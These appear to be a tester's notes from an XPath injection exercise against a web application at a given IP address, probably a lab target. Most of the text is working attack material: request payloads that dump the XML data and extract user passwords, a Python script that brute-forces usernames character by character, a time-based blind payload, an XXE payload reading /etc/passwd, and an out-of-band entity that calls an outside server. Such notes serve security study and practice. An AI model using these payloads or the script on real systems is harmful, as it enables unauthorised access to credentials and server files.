XPath Advanced Data Exfiltration

XPath Advanced Data Exfiltration Notes

1. Understanding XPath Injection

• XPath is used to query XML data.

• Injection occurs when user input is inserted into an XPath query without proper sanitization.

• Common attacks include authentication bypass, data extraction, and blind XPath injection.

2. Successful Payload Analysis

• The working payload:

  GET /index.php?q=SOMETHINGINVALID&f=fullstreetname+|+/*[1]/*[2]/*[3]/*[1]/*[3]

• The | (union operator) allowed traversal through multiple XML nodes.

• The nested /*[1]/*[2]/*[3]/*[1]/*[3] structure accessed deeper elements in the XML hierarchy.

3. Additional Exploration

Extract Full XML Structure

• Try dumping all available XML elements:

  GET /index.php?q=SOMETHINGINVALID&f=| //*

• Navigate deeper step by step:

  GET /index.php?q=SOMETHINGINVALID&f=| /*/*/*/*

Extract Multiple Fields

• To retrieve multiple values at once:

  GET /index.php?q=SOMETHINGINVALID&f=fullstreetname | phone | email

Extract Usernames and Passwords

• List all users:

  GET /index.php?q=SOMETHINGINVALID&f=//users/user/*

• Extract credentials:

  GET /index.php?q=SOMETHINGINVALID&f=//users/user[1]/password

4. Blind XPath Injection

Boolean-Based Extraction

• Check if a username starts with ‘A’:

  GET /index.php?q=SOMETHINGINVALID&f=boolean(substring(//users/user/username,1,1)='A')

Automated Character-by-Character Extraction

import requests
import string

url = "http://94.237.53.146:51113/index.php"
extracted_data = ""

for i in range(1, 50):  # Adjust based on expected length
    for char in string.ascii_letters + string.digits:
        payload = f"substring(//users/user/username,{i},1)='{char}'"
        response = requests.get(url, params={"q": "SOMETHINGINVALID", "f": payload})
        
        if "valid response" in response.text:  # Adjust based on response behavior
            extracted_data += char
            print(f"Extracted so far: {extracted_data}")
            break

print(f"Final Extracted Data: {extracted_data}")

5. Advanced Attacks

Time-Based Blind Injection

• If there’s no direct output, force longer responses:

  GET /index.php?q=SOMETHINGINVALID&f=if(boolean(substring(//users/user/username,1,1)='A'), //*[count(//users/user/*) > 100000], //*[1])

Testing for XXE Injection

<?xml version="1.0"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<foo>&xxe;</foo>

• If the response includes file contents, the server is vulnerable.

Out-of-Band (OOB) Data Exfiltration

<!DOCTYPE foo [ <!ENTITY % remote SYSTEM "http://your-server.com/malicious.dtd"> %remote; ]>

• If the server contacts your external URL, it confirms an OOB vulnerability.

Conclusion

• XPath injection was successfully exploited.

• Additional attacks were tested for further enumeration.

• Blind extraction techniques and external entity vulnerabilities were explored.